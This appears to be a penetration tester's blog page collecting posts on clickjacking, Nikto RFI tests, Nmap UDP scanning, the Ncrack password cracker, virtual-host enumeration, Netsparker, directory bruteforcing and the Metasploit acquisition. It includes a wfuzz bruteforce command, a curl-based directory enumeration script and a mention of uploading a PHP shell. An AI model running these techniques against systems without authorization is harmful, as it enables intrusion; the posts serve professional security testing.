Posts Tagged tools
ClickJacking, on the cheap…
So, Clickjacking…
“The basic idea is that an attacker loads the content of an external site into the site you’re visiting, sets the external content to be invisible and then overlays the page you’re looking at. When you click any link you see on the current page, you are in fact clicking on the externally loaded invisible page and about to load pretty much whatever the attacker wants…”
This is a current attack prevalent in a lot of advertising, pay-per-click schemes, and malware drops these days. The Attack Research guys did a pretty good rundown on the type of attacks that are being used in the wild.
Just a few days ago Samy from samy.pl released a quick clickjacking code generator. Check it out:
Your Nikto’s on Fire…
Earlier this week (or rather end of last week) Robert Hansen aka RSnake released a huge, compiled list of Remote File Include Vulnerable parameters. To sweeten the deal Rob Fuller (mubix) and a few others parsed out the OSVDB’s CSV database and the compiled milw0rm site for all RFI’s listed there.
What we’re left with is a gargantuan list of RFI vulnerabilities to search for.
The first thing that came to my mind when i saw that list is “hey i’ll parse that into the Nikto Database” but, alas, Sullo (Nikto’s author) moves quick! Sullo released a new version of Nikto like hotcakes.
In addition to RFI goodness 2.1.1 contains some bug fixes, etc;
- New remote file inclusion (RFI) testing
- Over 2300 new RFI tests (courtesy RSnake/OSVDB)
- Sending of each test ID in the User-Agent
- Libwhisker 2.5, which includes 2 new IDS evasion techniques
- Ability to run specific plugins
- XML report now includes SSL information
UDP Payload Scanning
** Note: We all love the Internet Storm Center. By far it’s one of the largest conglomerations of brilliant engineers i know. So it doesn’t really surprise me that when i was going to write a blog on Nmap’s new UDP payload scanning yesterday, contributor Rob VandenBrink beat me to it. Here is mine anyways =P Robs goes into great detail with some packet captures to show before and after.
UDP…UDP…UDP… oh how do i scan thee?
The issue facing accurate scanning of UDP ports is the nature of UDP programs themselves. Delivering anything other than a legitimate UDP Payload to a service usually results in a dropped packet. This is bad news for pentesters, as we want a full and accurate scan of our targets.
UDP Payload scanning is the solution (most of the time). Instead of scanning with an empty UDP packet, we send it a legitimate payload that works with the service we are scanning. If we receive a response it indicates an open port.
Before Nmap 5.21, Nmap did not support UDP payload scanning. Pentesters previously counted on free tools like UnicornScan, whose author Jack C. Louis passed away last year (rest in peace Jack), or udp-proto-scanner by Portcullis Labs.
Although these tools are often stellar, sometimes they are buggy and lack the Nmap type features we want in a port scanner.
Nmap 5.21 fixes our dilemma by adding the following UDP fingerprints for scanning:
udp/7 echo
udp/53 domain
udp/111 rpcbind
udp/123 ntp
udp/137 netbios-ns
udp/161 SNMP
udp/177 xdmcp
udp/500 ISAKMP
udp/520 route
udp/1645 RADIUS
udp/1812 RADIUS
udp/2049 NFS
udp/5353 zeroconf
udp/10080 amanda
I know this has been a good number of months in development, thanks for all the good work Fyodor and the Nmap Dev Community!
Ncrack – Network Password Cracker
The 2009 Summer of code has a special present for us pentesters. Normally, we use hydra or medusa to crack network service passwords (telnet, ftp, SSH, etc).
Ncrack changes the game a bit.
By bringing the nmap dev team/community to the table it shows promise to fix some current issues in bruteforcing network service passwords. This has already happened in one instance, read the openssh_library paper here. It also gives us the possibility to bruteforce multiple targets and takes the standard nmap target syntax (hostnames, CIDR, range, and single IP’s) which is very extensible and convenient for scripting.
Additionally it can take input from all Nmap’s output files, making certain portions of a pentest faster, meaner, and leaner. We can specify IP’s not to bruteforce, or pass it a whole list of IP’s not to test. It’s multi-threaded and provides easy tuning options (not all have been activated yet). In addition it has a very simple syntax for bruting services on non-standard ports.
While it’s still relatively new and doesn’t have a GUI like Hydra, or as many modules as Medusa, it’s still an awesome addition to any pentesters toolbelt.
Check out the man page here: http://nmap.org/ncrack/man.html
The latest version can be downloaded here: http://nmap.org/ncrack
Note: Ncrack is a new project started in the Summer of code: 2009. While it is already useful for some purposes, it is still unfinished, alpha quality software. You can help out by testing it and reporting any problems as described in the section called “Bugs”. Currently It still only has modules for FTP, SSH, TELNET and HTTP(S)
Happy Cracking!
Hostmap – shared/virtual host enumeration
You either love or hate Sun Tzu Quotes but, when they apply i’m inclined to use them 
“It is said that if you know your enemies and know yourself, you will not be imperiled in a hundred battles; if you do not know your enemies but do know yourself, you will win one and lose one; if you do not know your enemies nor yourself, you will be imperiled in every single battle”
And so it is also with some web servers! Do you manage your own hosting? Or, like the million others out there, do you share one mega-server hosting hundreds of other sites as well?
Part of the recon stage of pentesting is checking for shared hosting. If there are other sites on your same server, your security is only as strong as their security. Web applications they deploy may not be as well thought out, secure, or even documented.
Long have I searched for ways to enumerate these virtual hosts, but each avenue was a semi-manual process. Now I have settled on a stellar tool by Alessandro `jekil` Tanasi called Hostmap. It uses a plethora of dns and scraping tricks to accomplish this task for us. Check out the documentation =)
Interview: Ferruh Mavituna on Netsparker the New Web 2.0 Applicliaction Scanner
Also featured on Ethicalhacker.net Feel free to respond to this article or ask any/all questions to Ferruh at Ethicalhacker.net’s Forums
Today we showcase a new web application scanner called Netsparker, and believe us when we say that we put this app through the ringer.
There’s a big distinction between testing a tool against dummy apps in a lab and using it first hand against a large environment. Luckily for us we got to do both.
Over the course of a month we ran several engagements and specifically watched Netsparker’s performance compared to other tools we normally use in the assessment process (w3af, Grendel Scan, Nikto, Wikto, Websecurify, Paros, Burp, etc). We have to say, we are very impressed. Netsparker not only caught vulnerabilities that other scanners missed but also had excellent remediation and a documentation section for most of its findings.
For injection it does a full-scale attack, testing every parameter it can spider (which it also does very well), and, although this lengthens the testing time, it also awarded us with some valuable injection findings. Netsparker is developed by Mavituna Security, and more specifically our guest, Ferruh Mavituna.
—–
Ferruh, thanks for joining us today.
Simple yet effective: Directory Bruteforcing
One thing you learn when you start a career pentesting is:
Never assume anything.
In my experience hacks aren’t always elegant and elaborate. Sometimes something simple and effective is your avenue of penetration. Which brings us to today’s topic: directory bruteforcing.
Directory bruteforcing is a favorite of mine. I can’t tell you how many times a directory listing has broken open a pentest for me. Whether it be that all elusive web admin panel, or a directory listing containing a database with passwords, there’s almost always something hiding beneath that tidy little web server.
Before we start bashing away, and let’s be honest here that’s what we’re doing, we have to mention that this kind of enumeration can get you blacklisted. In fact if your scope doesn’t have you whitelisted for the engagement, we recommend you scan low and slow to get a feel for the targets response. It never hurts to have a backup IP (or a few) to scan from as well. Dealing with customer blacklisting is a pain.
Today, we’re showcasing python based Wfuzz by Edge-Security and Java based Dirbuster maintained by the OWASP project. Both are excellent directory and file brute forcing tools that come complete with lists of common (and sometimes not so common) directories or files. Both support recursion, multi-threading, and output to useful file formats. They are also great about inherent false positive detection and support proxies… excellent. We use Wfuzz on our *nix boxes and Dirbuster from Windows. We interchange lists frequently.
We hate to regurgitate verbatim but Wfuzz actually gives pretty good usage and feature documentation that can be seen on their website here.
“Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc.”
Usage:
# wfuzz.py -c -z file -f wordlists/commons.txt --hc 404 --html http://www.mypentesttarget.com/FUZZ 2> results.html
This does a basic directory bruteforce against http://mypentesttarget.com/ throwing http GETs to the web server matching every line in the wordlists/commons.txt file. It strips out the 404 not found responses and sends the output to an HTML file for later usage.
Wfuzz is actually a far more robust tool allowing you to fuzz web parameters to identify SQL injection, XSS, and bruteforce usernames and passwords. The lists for these injection strings are included with wfuzz. We will showcase Wfuzz in more detail in a future write-up.
Dirbuster is very similar. It uses a pretty java GUI that allows you to specify number of threads and tune the amount of threads on the fly (which is actually really handy). It also supports pausing which is useful. Another great feature it offers is selective recursion. If Dirbuster finds a directory it will automagically queue it for recursive scanning, but if we want to skip that directory we can un-check the tick box next to it and change this on the fly. The GUI itself is pretty self explanatory and you can see basic usage in the video.
So what are we looking for?
Some of our favorites are:
- Jboss admin panels
- Backend web administration (think VPN, firewall, and website management logins)
- OWA servers
- Frontpage Config Files
- Citrix Portals
- Directories with databases
- Webcam portals
- Development/stage versions of software/sites
- Default PHP Config files
- 401 credential protected directories
- Directories containing documents we can mine for metadata
- Scripts we can fiddle with (list below)
For file types we wanna look for things like scripts we might be able to manipulate, log files, etc:
- .log, .phtml, .php, .php3, .php4, .php5, .inc, .asp, .aspx, .pl, .pm, .cgi, .lib, .jsp, .jspx, .jsw, .jsv, .jspf, .cfm, .cfml, .cfc, .dbm, .mdb
Even resources that give you 403 Forbidden responses are valuable in identifying the web server’s structure and the apps that run on it.
Earlier we said that we interchange lists. Here’s why. Below are the sizes, in words, of the lists supplied with Wfuzz and Dirbuster (as well as another favorite tool of ours Grendel Scan). The whopping difference here is Dirbuster’s lists are huge comparatively. The reason for this is that Dirbuster uses a large number of numeric only resource requests. Dirbuster also seems to really take the word “bruteforce” to heart requesting less than technical directory names. We’d love to say “Use X list over Y list” but we really can’t. We have garnered valuable findings from all these lists. If you aren’t under the blacklisting/shunning gun per-se you can cat these into a “masterdirs” file and then sort and uniq it. Just be aware that these lists are unordered on purpose to be optimized, if we have the time to complete the full list then it doesn’t matter, but if you have a short testing time frame it will.
| Wfuzz | common 947 | medium 1660 | big 3037 | |
| Dirbuster | small 81643 | medium 207631 | big 1185252 |
|
| Grendel Scan | Small 100 | Medium 300 | Large 500 | XL 819 |
In our video we show the basic usage of both tools. We also showcase uploading a PHP shell from Laudanum and SamuraiWTF
If you’re working with a scope that limits tools you can install, or you want to comb over some could-be false positives from a tools output you can do this by using a bash script (be easy on our Bash foo!)
# cat dircurl.sh
#!/usr/bin/bash
if [[ $# -ne 2 ]]; then echo "usage: $0 directorylist www.target.com" exit fi
for i in $(cat $1) do echo -ne "directory: " echo -ne $i echo -ne "\t" echo -ne "count: " echo -ne `curl $2/$i 2> /dev/null | wc -l` echo done
This does a Curl request to each line in the supplied “directorylist” to the “target.com” and then does a wordcount (wc -l) on it. Look at the output, what is the most common response?
# bash dircurl.sh scanneroutput www.securityaegis.com
directory: sitemap count: 266 directory: archives count: 266 directory: wp-admin count: 7 directory: links count: 0 directory: login count: 266 directory: articles count: 266 directory: support count: 266 directory: keygen count: 266 directory: article count: 266 directory: help count: 266 directory: events count: 266 directory: archive count: 266 directory: register count: 266 directory: en count: 266 directory: forum count: 266 directory: wp-includes count: 7 directory: software count: 266 directory: downloads count: 266 directory: security count: 0 directory: category count: 266 directory: content count: 266 directory: main count: 266 directory: press count: 266 directory: media count: 266 directory: templates count: 266 directory: services count: 266 directory: icons count: 266 directory: wp-content count: 7 directory: resources count: 0 directory: info count: 0 directory: overnment count: 266 directory: corrections count: 266 directory: ajax count: 266 directory: icom_includes count: 266 directory: rules count: 266 directory: tr count: 266 directory: server count: 266 directory: mirrors count: 266 directory: government count: 266 directory: corrections count: 266
Looks like my error page (or in some cases my redirects) have about 266 newlines. Lets pipe that into grep -v 266, removing all lines containing 266:
# bash dircurl.sh scanneroutput www.securityaegis.com |grep -v 266
directory: wp-admin count: 7 directory: links count: 0 directory: wp-includes count: 7 directory: security count: 0 directory: wp-content count: 7 directory: resources count: 0 directory: info count: 0
This gives us a good place to start poking.
Thanks go to David, Paul, and Nate from the Redspin Team, and of course Mike Kelly (Laz3r) for his contributions on the video =)
Metasploit Buyout
New Logo
Today HD Moore and Rapid7 announced that Rapid7 has purchased the Metasploit Framework Project. The speculation around this has taken the pentest and vulnerability scanning community by storm. After talking with some colleagues I have come up with the following, here’s some things you should know:
First, be happy for H.D. Moore. He is one of the hardest working exploit devs and project managers in the world. Not only HD, but Egypt as the first paid core dev for the project. Congratulate them. Bravo.
HDM and Rapid7 have stated that “Rapid7 is 100% committed to keeping the project open source and the community development model.” This buyout is not so much of a buyout, it’s a corporate backing of MSF and HD’s vision of the project. For now (or “anytime soon”) the BSD 3 License will not be going anywhere. MSF will be sticking with Ruby and Rapid7 has no plans, for now, to corporatize MSF. Rapid7 wants to take the MSF brand and stand behind it.
There is some worry about community submissions to MSF now that it is owned by R7. Rob Fuller (mubix) gave a pretty straight forward answer to that in reply to Sourcefire’s VRT blog:
“For those not happy that the development for or submission of your ideas / exploits to the Metasploit project now that submissions will also go to Rapid 7 are seriously underestimating the fact that all those companies were pulling that information already.”
What does it mean for R7′s NeXpose Vulnerability product?
Well, it’s really about extensibility and market share . Adding the exploit database from MSF to NeXpose gives a far better risk rating to the product by adding a way to validate vulnerabilities and rate them by current known exploit code. They also gain the name, rights, branding, and developers for the MSF project which all funnels into Rapid7 corporate brand. As R7′s new CSO HD Moore brings his talents to the R7 table. In addition R7 does not just offer vulnerability management solutions but also penetration testing solutions, which is a market they have fought to be in for a while. Now they have legs to stand on, so to speak, when battling dominant market competitors like CORE , SAINT, and ImmunitySec.
Catch an exclusive interview with HD and R7 on the Risky Business Podcast =)
Heres a pretty complete article roundup on the buyout:
http://blog.metasploit.com
http://www.metasploit.com/home/faq
http://blog.metasploit.com/2009/10/metasploit-rising.html
http://www.rapid7.com/metasploit-announcement.jsp
http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1371945,00.html
http://www.darkreading.com/vulnerability_management/security/management/showArticle.jhtml?articleID=220800067
http://infosanity.wordpress.com/2009/10/21/rapid7-acquire-metasploit/
http://blog.ianetsec.net/perspective/2009/10/nick-selby-metasploit-acquisition-shakes-up-the-pentest-landscape.html
http://isc.sans.org/diary.html?storyid=7417
http://vrt-sourcefire.blogspot.com/2009/10/rapid7-make-bold-statement-acquiring.html
http://www.andrewhay.ca/archives/1085